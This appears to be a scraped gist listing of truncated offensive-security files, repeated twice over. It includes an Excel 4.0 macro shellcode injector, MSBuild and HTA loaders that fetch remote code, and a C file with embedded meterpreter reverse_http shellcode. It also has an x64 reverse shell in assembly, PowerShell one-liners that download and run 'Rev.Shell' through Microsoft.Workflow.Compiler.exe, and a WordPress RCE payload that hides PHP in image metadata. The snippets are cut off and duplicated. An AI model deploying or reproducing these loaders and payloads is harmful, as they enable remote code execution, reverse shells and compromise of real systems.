FlatL1ne FlatL1neAPT

## shellcode.xlsm
Once Excel is opened, click on the active tab, select "Insert" then "Macro MS Excel 4.0".

================================================================================
Paste this in cells in column A, starting in cell A1:
================================================================================

=REGISTRE("Kernel32";"VirtualAlloc";"JJJJJ";"VAlloc";;1;9)
=REGISTRE("Kernel32";"WriteProcessMemory";"JJJCJJ";"WProcessMemory";;1;9)
=REGISTRE("Kernel32";"CreateThread";"JJJJJJJ";"CThread";;1;9)
=VAlloc(0;4096;4096;64)

## msbuild_14_xsltransformation.csproj
<!-- "c:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe" c:\test\xslt_fun.csproj -->
<Project DefaultTargets="RunMe" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 <Target Name="RunMe">
  <XslTransformation
   UseTrustedSettings="true"
   XslInputPath="https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/e0d2854caf81778da8aaf5fc0cf06f798d9db4dd/xsl-notepad.xsl"
   XmlContent="&lt;?xml version=&quot;1.0&quot;?&gt;&lt;?xml-stylesheet type=&quot;text/xsl&quot;?&gt;&lt;a&gt;&lt;b&gt;&lt;c&gt;d&lt;/c&gt;&lt;/b&gt;&lt;/a&gt;"
   OutputPaths="delete_me.txt" />
 </Target>
</Project>

## poc.png
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" >
	<Target Name="Hello" >

	<!-- Call ANY .NET API -->
	<!--

		Author: Casey Smith, Twitter: @subTee

		License: BSD 3-Clause


## noscript-tracking.go
// Tracking cursor position in real-time without JavaScript
// Demo: https://twitter.com/davywtf/status/1124146339259002881

package main

import (
	"fmt"
	"net/http"
	"strings"
)

## TestMSHTAShellcodeDelivery.ps1
<#
  Simply Invoke the Script and send the target a link to http://192.168.1.1/app.hta
  To change your server, simply find and replace 192.168.1.1 with your server in the code.

#>

<#
	Moving Credtis for CACTUSTORCH HERE
	I was in escape sequcence hell ;-)
	'                                (              )  (            )

## shellcode_ExcelRegisterXLL.c
// Compile with: cl.exe x86_meterpreter_reverse_http.c /LD /o x86_meterpreter_reverse_http.xll
#include <Windows.h>

__declspec(dllexport) void __cdecl xlAutoOpen(void);

DWORD WINAPI ThreadFunction(LPVOID lpParameter)
{
	// Payload obtained via "msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=any.website.com LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai -f c"
	unsigned char b[] =
	"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"

## VitaLoader.java
//@author Sergi Granell
//@category _NEW_
//@keybinding
//@menupath
//@toolbar

/*
 * This script depends on the yamlbeans library.
 * Download the JAR from https://github.com/EsotericSoftware/yamlbeans/releases
 * and add the path to Ghidra's "Edit" -> "Plugin Path..." configuration.

## reverse-tcs-auth-shell.nasm
; =================================================
;   Password protected x64 TCP Reverse Shell
;   Author: Alan Vivona
; =================================================

global _start

    ; Syscall numbers
    syscalls.socket  equ 0x29
    syscalls.bind    equ 0x31

## PowerShell_Command.txt
64bit:
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell

32bit:
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsof

## wordpress-rce.js
var wpnonce = '';
var ajaxnonce = '';
var wp_attached_file = '';
var imgurl = '';
var postajaxdata = '';
var post_id = 0;
var cmd = '<?php phpinfo();/*';
var cmdlen = cmd.length
var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9';
var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd);
	Once Excel is opened, click on the active tab, select "Insert" then "Macro MS Excel 4.0".

	================================================================================
	Paste this in cells in column A, starting in cell A1:
	================================================================================

	=REGISTRE("Kernel32";"VirtualAlloc";"JJJJJ";"VAlloc";;1;9)
	=REGISTRE("Kernel32";"WriteProcessMemory";"JJJCJJ";"WProcessMemory";;1;9)
	=REGISTRE("Kernel32";"CreateThread";"JJJJJJJ";"CThread";;1;9)
	=VAlloc(0;4096;4096;64)
	<!-- "c:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe" c:\test\xslt_fun.csproj -->
	<Project DefaultTargets="RunMe" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<Target Name="RunMe">
	<XslTransformation
	UseTrustedSettings="true"
	XslInputPath="https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/e0d2854caf81778da8aaf5fc0cf06f798d9db4dd/xsl-notepad.xsl"
	XmlContent="<?xml version="1.0"?><?xml-stylesheet type="text/xsl"?><a><b><c>d</c></b></a>"
	OutputPaths="delete_me.txt" />
	</Target>
	</Project>
	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" >
	<Target Name="Hello" >

	<!-- Call ANY .NET API -->
	<!--

	Author: Casey Smith, Twitter: @subTee

	License: BSD 3-Clause
	// Tracking cursor position in real-time without JavaScript
	// Demo: https://twitter.com/davywtf/status/1124146339259002881

	package main

	import (
	"fmt"
	"net/http"
	"strings"
	)
	<#
	Simply Invoke the Script and send the target a link to http://192.168.1.1/app.hta
	To change your server, simply find and replace 192.168.1.1 with your server in the code.

	#>

	<#
	Moving Credtis for CACTUSTORCH HERE
	I was in escape sequcence hell ;-)
	' ( ) ( )
	// Compile with: cl.exe x86_meterpreter_reverse_http.c /LD /o x86_meterpreter_reverse_http.xll
	#include <Windows.h>

	__declspec(dllexport) void __cdecl xlAutoOpen(void);

	DWORD WINAPI ThreadFunction(LPVOID lpParameter)
	{
	// Payload obtained via "msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=any.website.com LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai -f c"
	unsigned char b[] =
	"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
	//@author Sergi Granell
	//@category _NEW_
	//@keybinding
	//@menupath
	//@toolbar

	/*
	* This script depends on the yamlbeans library.
	* Download the JAR from https://github.com/EsotericSoftware/yamlbeans/releases
	* and add the path to Ghidra's "Edit" -> "Plugin Path..." configuration.
	; =================================================
	; Password protected x64 TCP Reverse Shell
	; Author: Alan Vivona
	; =================================================

	global _start

	; Syscall numbers
	syscalls.socket equ 0x29
	syscalls.bind equ 0x31
	64bit:
	powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell

	32bit:
	powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsof
	var wpnonce = '';
	var ajaxnonce = '';
	var wp_attached_file = '';
	var imgurl = '';
	var postajaxdata = '';
	var post_id = 0;
	var cmd = '<?php phpinfo();/*';
	var cmdlen = cmd.length
	var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9';
	var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd);